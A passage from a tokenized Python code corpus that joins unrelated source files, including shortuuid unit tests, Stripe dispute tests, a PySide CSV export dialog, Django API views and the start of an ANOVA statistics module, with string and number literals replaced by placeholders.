<s> import os <EOL> import string <EOL> import sys <EOL> import unittest <EOL> import pep8 <EOL> from collections import defaultdict <EOL> from uuid import UUID , uuid4 <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( __file__ + "<STR_LIT>" ) ) <EOL> from shortuuid . main import * <EOL> class LegacyShortUUIDTest ( unittest . TestCase ) : <EOL> def test_generation ( self ) : <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> def test_encoding ( self ) : <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( encode ( u ) , "<STR_LIT>" ) <EOL> def test_decoding ( self ) : <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( decode ( "<STR_LIT>" ) , u ) <EOL> def test_alphabet ( self ) : <EOL> backup_alphabet = get_alphabet ( ) <EOL> alphabet = "<STR_LIT>" <EOL> set_alphabet ( alphabet ) <EOL> self . assertEqual ( alphabet , get_alphabet ( ) ) <EOL> set_alphabet ( "<STR_LIT>" ) <EOL> self . assertEqual ( alphabet , get_alphabet ( ) ) <EOL> self . assertEqual ( set ( uuid ( ) ) , set ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( <NUM_LIT> < len ( uuid ( ) ) < <NUM_LIT> ) <EOL> u = uuid4 ( ) <EOL> self . assertEqual ( u , decode ( encode ( u ) ) ) <EOL> u = uuid ( ) <EOL> self . assertEqual ( u , encode ( decode ( u ) ) ) <EOL> self . assertRaises ( ValueError , set_alphabet , "<STR_LIT:1>" ) <EOL> self . assertRaises ( ValueError , set_alphabet , "<STR_LIT>" ) <EOL> set_alphabet ( backup_alphabet ) <EOL> self . assertRaises ( ValueError , lambda x : ShortUUID ( x ) , "<STR_LIT:0>" ) <EOL> def test_random ( self ) : <EOL> self . assertEqual ( len ( random ( ) ) , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:100> ) : <EOL> self . 
assertEqual ( len ( random ( i ) ) , i ) <EOL> class ClassShortUUIDTest ( unittest . TestCase ) : <EOL> def test_generation ( self ) : <EOL> su = ShortUUID ( ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su . uuid ( "<STR_LIT>" ) ) < <NUM_LIT> ) <EOL> def test_encoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( su . encode ( u ) , "<STR_LIT>" ) <EOL> def test_decoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> u = UUID ( '<STR_LIT>' ) <EOL> self . assertEqual ( su . decode ( "<STR_LIT>" ) , u ) <EOL> def test_random ( self ) : <EOL> su = ShortUUID ( ) <EOL> for i in range ( <NUM_LIT:1000> ) : <EOL> self . assertEqual ( len ( su . random ( ) ) , <NUM_LIT> ) <EOL> for i in range ( <NUM_LIT:1> , <NUM_LIT:100> ) : <EOL> self . assertEqual ( len ( su . random ( i ) ) , i ) <EOL> def test_alphabet ( self ) : <EOL> alphabet = "<STR_LIT>" <EOL> su1 = ShortUUID ( alphabet ) <EOL> su2 = ShortUUID ( ) <EOL> self . assertEqual ( alphabet , su1 . get_alphabet ( ) ) <EOL> su1 . set_alphabet ( "<STR_LIT>" ) <EOL> self . assertEqual ( alphabet , su1 . get_alphabet ( ) ) <EOL> self . assertEqual ( set ( su1 . uuid ( ) ) , set ( "<STR_LIT>" ) ) <EOL> self . assertTrue ( <NUM_LIT> < len ( su1 . uuid ( ) ) < <NUM_LIT> ) <EOL> self . assertTrue ( <NUM_LIT:20> < len ( su2 . uuid ( ) ) < <NUM_LIT> ) <EOL> u = uuid4 ( ) <EOL> self . assertEqual ( u , su1 . decode ( su1 . encode ( u ) ) ) <EOL> u = su1 . uuid ( ) <EOL> self . assertEqual ( u , su1 . encode ( su1 . decode ( u ) ) ) <EOL> self . assertRaises ( ValueError , su1 . set_alphabet , "<STR_LIT:1>" ) <EOL> self . assertRaises ( ValueError , su1 . 
set_alphabet , "<STR_LIT>" ) <EOL> def test_encoded_length ( self ) : <EOL> su1 = ShortUUID ( ) <EOL> self . assertEqual ( su1 . encoded_length ( ) , <NUM_LIT> ) <EOL> base64_alphabet = string . ascii_uppercase + string . ascii_lowercase + string . digits + '<STR_LIT>' <EOL> su2 = ShortUUID ( base64_alphabet ) <EOL> self . assertEqual ( su2 . encoded_length ( ) , <NUM_LIT> ) <EOL> binary_alphabet = "<STR_LIT>" <EOL> su3 = ShortUUID ( binary_alphabet ) <EOL> self . assertEqual ( su3 . encoded_length ( ) , <NUM_LIT> ) <EOL> su4 = ShortUUID ( ) <EOL> self . assertEqual ( su4 . encoded_length ( num_bytes = <NUM_LIT:8> ) , <NUM_LIT:11> ) <EOL> def test_pep8 ( self ) : <EOL> pep8style = pep8 . StyleGuide ( [ [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , True ] , <EOL> [ '<STR_LIT>' , [ os . path . dirname ( <EOL> os . path . abspath ( __file__ ) ) ] ] ] , <EOL> parse_argv = False ) <EOL> report = pep8style . check_files ( ) <EOL> assert report . total_errors == <NUM_LIT:0> <EOL> class ShortUUIDPaddingTest ( unittest . TestCase ) : <EOL> def test_padding ( self ) : <EOL> su = ShortUUID ( ) <EOL> random_uid = uuid4 ( ) <EOL> smallest_uid = UUID ( int = <NUM_LIT:0> ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> encoded_small = su . encode ( smallest_uid ) <EOL> self . assertEqual ( len ( encoded_random ) , len ( encoded_small ) ) <EOL> def test_decoding ( self ) : <EOL> su = ShortUUID ( ) <EOL> random_uid = uuid4 ( ) <EOL> smallest_uid = UUID ( int = <NUM_LIT:0> ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> encoded_small = su . encode ( smallest_uid ) <EOL> self . assertEqual ( su . decode ( encoded_small ) , smallest_uid ) <EOL> self . assertEqual ( su . 
decode ( encoded_random ) , random_uid ) <EOL> def test_consistency ( self ) : <EOL> su = ShortUUID ( ) <EOL> num_iterations = <NUM_LIT:1000> <EOL> uid_lengths = defaultdict ( int ) <EOL> for count in range ( num_iterations ) : <EOL> random_uid = uuid4 ( ) <EOL> encoded_random = su . encode ( random_uid ) <EOL> uid_lengths [ len ( encoded_random ) ] += <NUM_LIT:1> <EOL> decoded_random = su . decode ( encoded_random ) <EOL> self . assertEqual ( random_uid , decoded_random ) <EOL> self . assertEqual ( len ( uid_lengths ) , <NUM_LIT:1> ) <EOL> uid_length = next ( iter ( uid_lengths . keys ( ) ) ) <EOL> self . assertEqual ( uid_lengths [ uid_length ] , num_iterations ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from fileutils import abspath <EOL> from languages import read_possible_languages <EOL> possible_languages = read_possible_languages ( abspath ( '<STR_LIT>' , app ) ) <EOL> routers = { <EOL> app : dict ( <EOL> default_language = possible_languages [ '<STR_LIT:default>' ] [ <NUM_LIT:0> ] , <EOL> languages = [ lang for lang in possible_languages <EOL> if lang != '<STR_LIT:default>' ] <EOL> ) <EOL> } </s>
<s> import sys <EOL> from os import chmod , environ , makedirs , rename , unlink <EOL> from os . path import dirname , exists , join , splitdrive <EOL> def get_root_path ( ) : <EOL> """<STR_LIT>""" <EOL> drive = splitdrive ( sys . executable ) [ <NUM_LIT:0> ] <EOL> if drive : <EOL> return '<STR_LIT>' % drive <EOL> return '<STR_LIT:/>' <EOL> def get_config_path ( name ) : <EOL> """<STR_LIT>""" <EOL> sp_root_dir = join ( environ . get ( '<STR_LIT>' , get_root_path ( ) ) , '<STR_LIT>' ) <EOL> return join ( sp_root_dir , '<STR_LIT>' , name ) <EOL> def store_config_file ( name , data ) : <EOL> """<STR_LIT>""" <EOL> fpath = get_config_path ( name ) <EOL> if not exists ( dirname ( fpath ) ) : <EOL> makedirs ( dirname ( fpath ) , <NUM_LIT> ) <EOL> tmp = fpath + '<STR_LIT>' <EOL> with open ( tmp , '<STR_LIT:w>' ) as fd : <EOL> fd . write ( data ) <EOL> chmod ( tmp , <NUM_LIT> ) <EOL> rename ( tmp , fpath ) <EOL> return fpath <EOL> def delete_config_file ( name ) : <EOL> fpath = get_config_path ( name ) <EOL> unlink ( fpath ) <EOL> return True <EOL> def get_config_file ( name , default = None ) : <EOL> """<STR_LIT>""" <EOL> fpath = get_config_path ( name ) <EOL> if exists ( fpath ) : <EOL> return open ( fpath , '<STR_LIT:r>' ) . read ( ) <EOL> else : <EOL> return default <EOL> def strip_equal_sign ( arguments ) : <EOL> """<STR_LIT>""" <EOL> for k , v in arguments . items ( ) : <EOL> if v and isinstance ( v , str ) and ( k . startswith ( '<STR_LIT>' ) or k . startswith ( '<STR_LIT:->' ) ) : <EOL> arguments . update ( { k : v . lstrip ( '<STR_LIT:=>' ) } ) <EOL> v . lstrip ( '<STR_LIT:=>' ) <EOL> return arguments <EOL> def find_non_dash_arguments_and_default_action ( arguments , resource , action ) : <EOL> """<STR_LIT>""" <EOL> from . actions import DEFAULT_ACTION <EOL> from . resources import AVAILABLE_RESOURCES <EOL> arguments = strip_equal_sign ( arguments ) <EOL> if resource and resource . find ( '<STR_LIT:=>' ) != - <NUM_LIT:1> : <EOL> arguments [ '<STR_LIT>' ] . 
append ( resource ) <EOL> arguments [ '<STR_LIT>' ] = None <EOL> resource = None <EOL> if action in AVAILABLE_RESOURCES and not resource : <EOL> resource = action <EOL> action = DEFAULT_ACTION <EOL> return arguments , resource , action <EOL> def check_primary_identifier_without_flags ( arguments , resource , action ) : <EOL> """<STR_LIT>""" <EOL> from stormpath . client import Client <EOL> for i , attr in enumerate ( arguments . get ( '<STR_LIT>' ) ) : <EOL> if attr . find ( "<STR_LIT:=>" ) == - <NUM_LIT:1> : <EOL> if attr . startswith ( Client . BASE_URL ) : <EOL> arguments [ '<STR_LIT>' ] [ i ] = '<STR_LIT>' + attr <EOL> else : <EOL> primary_attr = '<STR_LIT:email>' if resource . find ( '<STR_LIT>' ) != - <NUM_LIT:1> else '<STR_LIT:name>' <EOL> arguments [ '<STR_LIT>' ] [ i ] = primary_attr + "<STR_LIT:=>" + attr <EOL> return arguments <EOL> def properly_support_boolean_values ( arguments ) : <EOL> def _txt_to_bool ( val ) : <EOL> ret = '<STR_LIT:true>' if ( val == '<STR_LIT:true>' or val == '<STR_LIT:1>' or val == '<STR_LIT:True>' ) else '<STR_LIT:false>' <EOL> return ret <EOL> arguments [ '<STR_LIT>' ] = _txt_to_bool ( arguments . get ( '<STR_LIT>' ) ) <EOL> arguments [ '<STR_LIT>' ] = _txt_to_bool ( arguments . get ( '<STR_LIT>' ) ) <EOL> return arguments </s>
<s> from . _pcl import * <EOL> import sys <EOL> def load ( path , format = None ) : <EOL> """<STR_LIT>""" <EOL> format = _infer_format ( path , format ) <EOL> p = PointCloud ( ) <EOL> try : <EOL> loader = getattr ( p , "<STR_LIT>" % format ) <EOL> except AttributeError : <EOL> raise ValueError ( "<STR_LIT>" % format ) <EOL> if loader ( _encode ( path ) ) : <EOL> raise IOError ( "<STR_LIT>" <EOL> % ( path , format ) ) <EOL> return p <EOL> def save ( cloud , path , format = None , binary = False ) : <EOL> """<STR_LIT>""" <EOL> format = _infer_format ( path , format ) <EOL> try : <EOL> dumper = getattr ( cloud , "<STR_LIT>" % format ) <EOL> except AttributeError : <EOL> raise ValueError ( "<STR_LIT>" % format ) <EOL> if dumper ( _encode ( path ) , binary ) : <EOL> raise IOError ( "<STR_LIT>" <EOL> % ( path , format ) ) <EOL> def _encode ( path ) : <EOL> if isinstance ( path , bytes ) : <EOL> return path <EOL> else : <EOL> return path . encode ( sys . getfilesystemencoding ( ) ) <EOL> def _infer_format ( path , format ) : <EOL> if format is not None : <EOL> return format . lower ( ) <EOL> for candidate in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> if path . endswith ( "<STR_LIT:.>" + candidate ) : <EOL> return candidate <EOL> raise ValueError ( "<STR_LIT>" % path ) </s>
<s> import os <EOL> import sys <EOL> extensions = [ ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_trees = [ ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT>' if os . environ . get ( '<STR_LIT>' ) else '<STR_LIT>' <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> latex_elements = { <EOL> '<STR_LIT>' : "<STR_LIT>" . join ( ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) ) , <EOL> } </s>
<s> from django . contrib import admin <EOL> import models <EOL> admin . site . register ( models . User ) </s>
<s> import stripe <EOL> from stripe . test . helper import ( <EOL> StripeResourceTest , DUMMY_DISPUTE , NOW <EOL> ) <EOL> class DisputeTest ( StripeResourceTest ) : <EOL> def test_list_all_disputes ( self ) : <EOL> stripe . Dispute . list ( created = { '<STR_LIT>' : NOW } ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { <EOL> '<STR_LIT>' : { '<STR_LIT>' : NOW } , <EOL> } <EOL> ) <EOL> def test_create_dispute ( self ) : <EOL> stripe . Dispute . create ( idempotency_key = '<STR_LIT:foo>' , ** DUMMY_DISPUTE ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> DUMMY_DISPUTE , <EOL> { '<STR_LIT>' : '<STR_LIT:foo>' } , <EOL> ) <EOL> def test_retrieve_dispute ( self ) : <EOL> stripe . Dispute . retrieve ( '<STR_LIT>' ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { } , <EOL> None <EOL> ) <EOL> def test_update_dispute ( self ) : <EOL> dispute = stripe . Dispute . construct_from ( { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT:description>' , <EOL> } , <EOL> } , '<STR_LIT>' ) <EOL> dispute . evidence [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> dispute . evidence [ '<STR_LIT>' ] = '<STR_LIT:text>' <EOL> dispute . save ( ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { '<STR_LIT>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:text>' , <EOL> } } , <EOL> None <EOL> ) <EOL> def test_close_dispute ( self ) : <EOL> dispute = stripe . Dispute ( id = '<STR_LIT>' ) <EOL> dispute . close ( idempotency_key = '<STR_LIT:foo>' ) <EOL> self . requestor_mock . request . assert_called_with ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> { } , <EOL> { '<STR_LIT>' : '<STR_LIT:foo>' } , <EOL> ) </s>
<s> from PySide . QtCore import * <EOL> from PySide . QtGui import * <EOL> import csv <EOL> from progressbar import ProgressBar <EOL> import codecs <EOL> from pandas import merge , read_csv <EOL> from database import * <EOL> class ExportFileDialog ( QFileDialog ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ExportFileDialog , self ) . __init__ ( * args , ** kwargs ) <EOL> self . mainWindow = self . parent ( ) <EOL> self . setWindowTitle ( "<STR_LIT>" ) <EOL> self . setAcceptMode ( QFileDialog . AcceptSave ) <EOL> self . setFilter ( "<STR_LIT>" ) <EOL> self . setDefaultSuffix ( "<STR_LIT>" ) <EOL> self . optionBOM = QCheckBox ( "<STR_LIT>" , self ) <EOL> self . optionBOM . setCheckState ( Qt . CheckState . Checked ) <EOL> self . optionWide = QCheckBox ( "<STR_LIT>" , self ) <EOL> self . optionWide . setCheckState ( Qt . CheckState . Unchecked ) <EOL> self . optionAll = QComboBox ( self ) <EOL> self . optionAll . insertItems ( <NUM_LIT:0> , [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if self . mainWindow . tree . noneOrAllSelected ( ) : <EOL> self . optionAll . setCurrentIndex ( <NUM_LIT:0> ) <EOL> else : <EOL> self . optionAll . setCurrentIndex ( <NUM_LIT:1> ) <EOL> layout = self . layout ( ) <EOL> row = layout . rowCount ( ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionBOM , row , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row + <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionWide , row + <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> layout . addWidget ( QLabel ( '<STR_LIT>' ) , row + <NUM_LIT:2> , <NUM_LIT:0> ) <EOL> layout . addWidget ( self . optionAll , row + <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> self . setLayout ( layout ) <EOL> if self . exec_ ( ) : <EOL> if os . path . isfile ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) : <EOL> os . 
remove ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) <EOL> output = open ( self . selectedFiles ( ) [ <NUM_LIT:0> ] , '<STR_LIT:wb>' ) <EOL> try : <EOL> if self . optionBOM . isChecked ( ) and not self . optionWide . isChecked ( ) : <EOL> output . write ( codecs . BOM_UTF8 ) <EOL> if self . optionAll . currentIndex ( ) == <NUM_LIT:0> : <EOL> self . exportAllNodes ( output ) <EOL> else : <EOL> self . exportSelectedNodes ( output ) <EOL> finally : <EOL> output . close ( ) <EOL> if self . optionWide . isChecked ( ) : <EOL> self . convertToWideFormat ( self . selectedFiles ( ) [ <NUM_LIT:0> ] ) <EOL> def exportSelectedNodes ( self , output ) : <EOL> progress = ProgressBar ( "<STR_LIT>" , self . mainWindow ) <EOL> indexes = self . mainWindow . tree . selectedIndexesAndChildren ( ) <EOL> progress . setMaximum ( len ( indexes ) ) <EOL> try : <EOL> writer = csv . writer ( output , delimiter = '<STR_LIT:;>' , quotechar = '<STR_LIT:">' , quoting = csv . QUOTE_ALL , doublequote = True , <EOL> lineterminator = '<STR_LIT:\r\n>' ) <EOL> row = [ unicode ( val ) . encode ( "<STR_LIT:utf-8>" ) for val in self . mainWindow . tree . treemodel . getRowHeader ( ) ] <EOL> writer . writerow ( row ) <EOL> for no in range ( len ( indexes ) ) : <EOL> if progress . wasCanceled : <EOL> break <EOL> row = [ unicode ( val ) . encode ( "<STR_LIT:utf-8>" ) for val in self . mainWindow . tree . treemodel . getRowData ( indexes [ no ] ) ] <EOL> writer . writerow ( row ) <EOL> progress . step ( ) <EOL> finally : <EOL> progress . close ( ) <EOL> def exportAllNodes ( self , output ) : <EOL> progress = ProgressBar ( "<STR_LIT>" , self . mainWindow ) <EOL> progress . setMaximum ( Node . query . count ( ) ) <EOL> try : <EOL> writer = csv . writer ( output , delimiter = '<STR_LIT:;>' , quotechar = '<STR_LIT:">' , quoting = csv . 
QUOTE_ALL , doublequote = True , <EOL> lineterminator = '<STR_LIT:\r\n>' ) <EOL> row = [ "<STR_LIT>" , "<STR_LIT:id>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" ] <EOL> for key in self . mainWindow . tree . treemodel . customcolumns : <EOL> row . append ( key ) <EOL> writer . writerow ( row ) <EOL> page = <NUM_LIT:0> <EOL> while True : <EOL> allnodes = Node . query . offset ( page * <NUM_LIT> ) . limit ( <NUM_LIT> ) <EOL> if allnodes . count ( ) == <NUM_LIT:0> : <EOL> break <EOL> for node in allnodes : <EOL> if progress . wasCanceled : <EOL> break <EOL> row = [ node . level , node . id , node . parent_id , node . objectid_encoded , node . objecttype , <EOL> node . querystatus , node . querytime , node . querytype ] <EOL> for key in self . mainWindow . tree . treemodel . customcolumns : <EOL> row . append ( node . getResponseValue ( key , "<STR_LIT:utf-8>" ) ) <EOL> writer . writerow ( row ) <EOL> progress . step ( ) <EOL> if progress . wasCanceled : <EOL> break <EOL> else : <EOL> page += <NUM_LIT:1> <EOL> finally : <EOL> progress . close ( ) <EOL> def convertToWideFormat ( self , filename ) : <EOL> def flattenTable ( fulltable , levelcol , idcol , parentidcol , countchildren , removeempty ) : <EOL> fulltable [ [ levelcol ] ] = fulltable [ [ levelcol ] ] . astype ( int ) <EOL> levels = dict ( list ( fulltable . groupby ( levelcol ) ) ) <EOL> minlevel = fulltable . level . min ( ) <EOL> for level , data in sorted ( levels . iteritems ( ) ) : <EOL> if level == minlevel : <EOL> data = data . add_prefix ( '<STR_LIT>' . format ( level ) ) <EOL> flattable = data <EOL> else : <EOL> for col_countchildren in countchildren : <EOL> children = data [ parentidcol ] . groupby ( [ data [ parentidcol ] , data [ col_countchildren ] ] ) . count ( ) <EOL> children = children . unstack ( col_countchildren ) <EOL> children [ '<STR_LIT>' ] = children . sum ( axis = <NUM_LIT:1> ) <EOL> children = children . add_prefix ( '<STR_LIT>' . 
format ( level - <NUM_LIT:1> , col_countchildren ) ) <EOL> leftkey = '<STR_LIT>' . format ( level - <NUM_LIT:1> ) <EOL> flattable = merge ( flattable , children , how = '<STR_LIT:left>' , left_on = leftkey , right_index = True ) <EOL> flattable [ children . columns . values . tolist ( ) ] = flattable [ children . columns . values . tolist ( ) ] . fillna ( <NUM_LIT:0> ) . astype ( int ) <EOL> data [ '<STR_LIT>' ] = data . groupby ( parentidcol ) . cumcount ( ) <EOL> leftkey = '<STR_LIT>' . format ( level - <NUM_LIT:1> , idcol ) <EOL> rightkey = '<STR_LIT>' . format ( level , parentidcol ) <EOL> data = data . drop ( [ levelcol ] , axis = <NUM_LIT:1> ) <EOL> data = data . add_prefix ( '<STR_LIT>' . format ( level ) ) <EOL> flattable = merge ( flattable , data , how = "<STR_LIT>" , left_on = leftkey , right_on = rightkey ) <EOL> if removeempty : <EOL> flattable = flattable . dropna ( axis = <NUM_LIT:1> , how = '<STR_LIT:all>' ) <EOL> return flattable <EOL> try : <EOL> data = read_csv ( filename , sep = "<STR_LIT:;>" , encoding = '<STR_LIT:utf-8>' , dtype = str ) <EOL> newdata = flattenTable ( data , '<STR_LIT>' , '<STR_LIT:id>' , '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , False ) <EOL> outfile = open ( filename , '<STR_LIT:wb>' ) <EOL> try : <EOL> if self . optionBOM . isChecked ( ) : <EOL> outfile . write ( codecs . BOM_UTF8 ) <EOL> newdata . to_csv ( outfile , sep = '<STR_LIT:;>' , index = False , encoding = "<STR_LIT:utf-8>" ) <EOL> finally : <EOL> outfile . close ( ) <EOL> except Exception as e : <EOL> self . mainWindow . logmessage ( e ) </s>
<s> import io , subprocess , sqlite3 , collections , datetime , re , sys , operator <EOL> def run ( args , db ) : <EOL> cmd = '<STR_LIT>' <EOL> table = '<STR_LIT>' <EOL> out_structure = """<STR_LIT>""" . split ( '<STR_LIT:\n>' ) <EOL> class Column : <EOL> def __init__ ( s , ** kwargs ) : <EOL> for k , v in kwargs . items ( ) : <EOL> setattr ( s , k , v ) <EOL> columns = [ ] <EOL> for out , field , type in map ( lambda s : s . split ( ) , out_structure ) : <EOL> columns . append ( Column ( out = out , field = field , type = type ) ) <EOL> args . extend ( [ '<STR_LIT>' , '<STR_LIT:U+002C>' . join ( [ col . out for col in columns ] ) ] ) <EOL> args . append ( '<STR_LIT>' ) <EOL> bout = subprocess . check_output ( [ cmd ] + args ) <EOL> out_lines = bout . decode ( errors = '<STR_LIT>' ) . split ( '<STR_LIT:\n>' ) <EOL> out_lines . pop ( ) <EOL> header = out_lines . pop ( <NUM_LIT:0> ) <EOL> spaces = [ ix for ix , c in enumerate ( header ) if c == '<STR_LIT:U+0020>' ] <EOL> for line in out_lines : <EOL> spaces = [ ix for ix in spaces if line [ ix ] == '<STR_LIT:U+0020>' ] <EOL> header = '<STR_LIT>' . join ( '<STR_LIT:*>' if ix in spaces and ( ( ix - <NUM_LIT:1> ) not in spaces ) else c for ix , c in enumerate ( header ) ) <EOL> header += '<STR_LIT:U+0020>' * ( max ( map ( len , out_lines ) ) - len ( header ) ) <EOL> header = re . sub ( '<STR_LIT>' , lambda mo : '<STR_LIT:U+0020>' + mo . group ( <NUM_LIT:1> ) , header ) <EOL> headers = header . split ( '<STR_LIT:*>' ) <EOL> assert len ( headers ) == len ( columns ) , '<STR_LIT>' . format ( len ( headers ) , len ( columns ) ) <EOL> sql = '<STR_LIT>' . format ( table = table , columns = '<STR_LIT:U+002C>' . join ( [ '<STR_LIT>' . format ( col . field , col . type ) for col in columns ] ) ) <EOL> db . execute ( sql ) <EOL> for line in out_lines : <EOL> h_start = <NUM_LIT:0> <EOL> h_end = <NUM_LIT:0> <EOL> vals = [ ] <EOL> for h in headers : <EOL> h_end += len ( h ) <EOL> val = line [ h_start : h_end ] . 
strip ( ) <EOL> vals . append ( val ) <EOL> h_start = h_end + <NUM_LIT:1> <EOL> h_end = h_start <EOL> q_marks = '<STR_LIT:U+002C>' . join ( '<STR_LIT:?>' * len ( vals ) ) <EOL> db . execute ( '<STR_LIT>' . format ( table = table , q = q_marks ) , tuple ( vals ) ) </s>
<s> import json <EOL> from django . http import ( <EOL> HttpResponse , <EOL> HttpResponseForbidden ) <EOL> from django . views . generic import View <EOL> class BaseAPIView ( View ) : <EOL> resource = None <EOL> def get_response ( self , data ) : <EOL> status = <NUM_LIT> if '<STR_LIT:error>' in data else <NUM_LIT:200> <EOL> return HttpResponse ( json . dumps ( data ) , status = status , <EOL> mimetype = '<STR_LIT:application/json>' ) <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> if request . method != '<STR_LIT:GET>' : <EOL> return HttpResponseForbidden ( ) <EOL> request . _user = None <EOL> if self . resource . needs_authorization : <EOL> request . _user = self . resource . authorize ( request ) <EOL> if not request . _user : <EOL> return HttpResponseForbidden ( ) <EOL> return super ( BaseAPIView , self ) . dispatch ( request , * args , ** kwargs ) <EOL> class ListView ( BaseAPIView ) : <EOL> def get ( self , request , * args , ** kwargs ) : <EOL> return self . get_response ( <EOL> self . resource . get_list ( <EOL> request . GET . dict ( ) , <EOL> user = request . _user ) ) <EOL> class ItemView ( BaseAPIView ) : <EOL> def get ( self , request , _id , * args , ** kwargs ) : <EOL> return self . get_response ( <EOL> self . resource . get_one ( <EOL> request . GET . dict ( ) , _id , request . _user ) ) </s>
<s> if <NUM_LIT:1> : <EOL> import numpy as N <EOL> from statlib import pstat , stats <EOL> from pstat import * <EOL> from stats import * <EOL> from numpy import linalg as LA <EOL> import operator , math <EOL> def aanova ( data , effects = [ '<STR_LIT:A>' , '<STR_LIT:B>' , '<STR_LIT:C>' , '<STR_LIT:D>' , '<STR_LIT:E>' , '<STR_LIT:F>' , '<STR_LIT>' , '<STR_LIT:H>' , '<STR_LIT:I>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> global alluniqueslist , Nlevels , Nfactors , Nsubjects , Nblevels , Nallsources <EOL> global Bscols , Bbetweens , SSlist , SSsources , DM , DN , Bwonly_sources , D <EOL> global Bwithins , alleffects , alleffsources <EOL> outputlist = [ ] <EOL> SSbtw = [ ] <EOL> SSbtwsources = [ ] <EOL> SSwb = [ ] <EOL> SSwbsources = [ ] <EOL> alleffects = [ ] <EOL> alleffsources = [ ] <EOL> SSlist = [ ] <EOL> SSsources = [ ] <EOL> print <EOL> variables = <NUM_LIT:1> <EOL> if type ( data ) != type ( [ ] ) : <EOL> data = data . tolist ( ) <EOL> alluniqueslist = [ <NUM_LIT:0> ] * ( len ( data [ <NUM_LIT:0> ] ) - variables ) <EOL> Nlevels = [ <NUM_LIT:0> ] * ( len ( data [ <NUM_LIT:0> ] ) - variables ) <EOL> for column in range ( len ( Nlevels ) ) : <EOL> alluniqueslist [ column ] = pstat . unique ( pstat . colex ( data , column ) ) <EOL> Nlevels [ column ] = len ( alluniqueslist [ column ] ) <EOL> Ncells = N . multiply . reduce ( Nlevels [ <NUM_LIT:1> : ] ) <EOL> Nfactors = len ( Nlevels [ <NUM_LIT:1> : ] ) <EOL> Nallsources = <NUM_LIT:2> ** ( Nfactors + <NUM_LIT:1> ) <EOL> Nsubjects = len ( alluniqueslist [ <NUM_LIT:0> ] ) <EOL> Bwithins = findwithin ( data ) <EOL> Bbetweens = ~ Bwithins & ( Nallsources - <NUM_LIT:1> ) - <NUM_LIT:1> <EOL> Wcolumns = makelist ( Bwithins , Nfactors + <NUM_LIT:1> ) <EOL> Wscols = 